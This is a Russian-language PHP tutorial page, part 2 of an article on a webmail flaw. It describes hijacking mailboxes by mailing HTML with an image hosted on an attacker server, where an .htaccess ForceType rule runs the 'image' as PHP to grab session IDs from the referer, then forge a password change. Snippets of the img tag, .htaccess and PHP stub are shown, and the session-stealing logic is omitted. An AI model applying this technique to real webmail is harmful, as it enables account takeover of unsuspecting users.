PHP в деталях



         

Дверца в защите: почтовый веб-интерфейс - часть 2


Если злоумышленник не имеет постоянного соединения с сетью, он может воспользоваться дырками в фильтрации тегов, чтобы установить с помощью языков сценариев пересылку (для этого придётся отправить дополнительное письмо с кодом подтверждения).

На самом деле, можно поставить взлом ящиков на поток и не караулить жертв, сидя на линии.

Итак, мы имеем почтовый сервис, который

а) авторизует пользователей по технологии аналогичной [].

б) не делает проверки IP-адресов

в) не проверяет содержимое писем формата html

г) не требует подтверждений изменений системных настроек

А проверка содержимого должна заключаться помимо всего прочего и в безжалостной резке всех картинок, которые не идут в аттачменте, а вызываются с другого адреса. ВСЕХ КАРТИНОК, ВСЕХ!

Мы же, крутые хацкеры, используем Apache+PHP.

Итак, что мы делаем.

1. Отправляем по разным адресам почтового сервиса письма в формате html с тегом

<img src=http://www.server.com/picture.jpg>

например, с поздравительной открыткой. :)

2. В директории с открыткой кладем файл .htaccess следующего содержания:

<Files "picture.jpg">

ForceType application/x-httpd-php

</Files>

3. Вместо открытки пишем файл picture.jpg с таким кодом:

<?

header("Content-type: image/gif");

include("otkrytka.jpg");

4. А поздравительную открытку кладем именно в файл otkrytka.jpg.

Директива ForceType в .htaccess заставляет сервер обрабатывать файл .jpg как скрипт php, который по завершении работы выдает пользователю картинку, и узнать, что скрипт что-то там делал, невозможно. А скрипт делает простую вещь ? разбирает переменную , выкусывает оттуда идентификатор сессии и... в два приема лишает пользователя ящика. На машине жертвы не происходит ничего, все делает скрипт на сервере злоумышленника:

5. [] с веб-мэйлом, имитируя отправку формы системных настроек (имена переменных надо написать ручками), а именно изменение пароля на нужный злоумышленнику (и, например, уведомляет автора о том, что такой-то ящик захвачен). Дабы не вызвать подозрений, можно формировать нужные заголовки ? рефереры, user agent и т.п.




Содержание  Назад  Вперед